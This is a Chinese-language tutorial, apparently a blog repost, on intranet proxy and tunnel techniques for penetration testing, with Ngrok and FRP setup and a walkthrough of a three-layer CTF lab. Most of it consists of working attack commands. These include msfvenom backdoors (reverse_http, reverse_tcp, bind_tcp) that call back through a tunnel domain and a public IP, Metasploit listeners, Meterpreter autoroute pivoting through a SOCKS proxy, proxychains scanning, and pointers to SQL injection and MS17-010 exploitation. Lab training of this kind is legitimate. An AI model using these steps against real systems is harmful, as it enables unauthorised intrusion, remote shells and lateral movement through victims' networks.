1. 程式人生 > 其它 >1.內網安全代理技術

1.內網安全代理技術

0x01.基礎知識

1.內外網簡單知識

常見的內網地址:
10.x.x.x
172.16.x.x---172.31.x.x
192.168.x.x

2.內網 1 和內網 2 通訊問題

老王的個人電腦 (連線自己家wifi)
老李的個人電腦 (連線自己家wifi)

這個時候通過代理 , 讓兩個電腦的連線

3.正向反向協議通訊連線問題

正向 : 對方有一個唯一的公網地址 , 你能夠找到他
反向 : 對方只要能夠出網 , 然後你有一個公網地址 , 他能找到你

4.內網穿透代理隧道技術說明

代理 : 解決的是網路通訊問題
隧道 : 解決的是流量分析工具 , 流量檢測工具 , 和防火牆相關過濾問題

兩個功能是不一樣的

0x02.內網穿透Ngrok

測試演示-兩個內網通訊上線

實驗環境:兩個不同的內網(有網路)實現穿透控制
1.註冊-購買-填寫-確認 http://www.ngrok.cc/
協議:http 本地埠:127.0.0.1:80

下載客戶端

記住你的隧道域名後面會用到 http://xxxxxxxxxxxx 和 隧道id xxsjdbswqdwe11324nsj

2.測試:內網 1 執行後門-免費主機處理-內網 2 監聽-內網 2 接受器
./sunny clientid aa0676878c162ffc

3.msf生成後門
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o
test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.76.132
set lport 4444
exploit

簡單理解 : 你可以理解成在兩個電腦之間搞了中介 , 中介負責傳遞你們之間傳遞的資料

0x03.內網穿透 Frp

自行搭建,方便修改,成本低,使用多樣化,適合高富帥及隱私哥哥們

1.服務端-下載-解壓-修改-啟動(阿里雲主機記得修改安全組配置出入口)
伺服器修改配置檔案 frps.ini:
[common]
bind_port = 6677

啟動服務端:
./frps -c ./frps.ini

2.控制端-下載-解壓-修改-啟動
控制端修改配置檔案 frpc.ini:
[common]
server_addr = 你的雲主機 ip
server_port = 6677            #frpc 工作埠,必須和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555            #轉發給本機的 5555
remote_port = 6000        #服務端用 6000 埠轉發給本機

啟動客戶端:
./frpc -c ./frpc.ini

msf生成後門測試

msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o mm.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit

3.靶機執行 mm.exe 即可

0x04.CFS三層內網漫遊安全測試演練

來源 2019 某 CTF 線下賽真題內網結合 WEB 攻防題庫,涉及 WEB 攻擊,內網代理路由等技術,每臺
伺服器存在一個 Flag,獲取每一個 Flag 對應一個積分,獲取三個 Flag 結尾。

別被嚇到了 , 實際上很簡單 , 就是通過1攻擊2, 2再攻擊3

1.Target1

探針目標-利用 WEB 漏洞(TP5_RCE)-獲取 webshell 許可權-獲取 Flag-Target2
1.生成後門:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf

2.接受反彈:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit

3.資訊收集及配置訪問
獲取網路介面:run get_local_subnets             # 返回當前機器的所有網絡卡
檢視路由地址:run autoroute -p
新增路由地址:run autoroute -s 192.168.22.0/24  # 目標的網段 , 這樣就可以和22段通訊了 , 但是當前只有msf會話可以訪問
開啟本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit

4.利用本地代理介面訪問測試
設定瀏覽器代理進行訪問測試
linux:
配置 proxychains 後呼叫工具探針 Target2
/etc/proxychains.conf
socks4 192.168.76.132 2222
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80
-Pn:掃描主機檢測其是否受到資料包過濾軟體或防火牆的保護。
-sT:掃描 TCP 資料包已建立的連線 connect
windows:
利用代理工具 Proxifier 或 SocksCap64 載入代理進行程序訪問測試

2.Target2

探針目標-利用 WEB 漏洞(SQL 注入)-後臺獲取 webshell 許可權-獲取 Flag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql 注入
http://192.168.22.128/index.php?r=admini/public/login #後臺
http://192.168.22.128/index.php?r=special #後門 shell
1.生成正向後門:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.訪問接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit

受害主機執行t2.elf就可以拿到會話了

3.資訊收集及配置訪問
獲取網路介面:run get_local_subnets
檢視路由地址:run autoroute -p
新增路由地址:run autoroute -s 192.168.33.0/24

3.Target3

traget3上面有ms-17-010漏洞 , 但是你要設定payload為正向連線 , 設定RHOST為目標主機地址 , 因為他不能反向連線你然後 run 就可以拿到會話了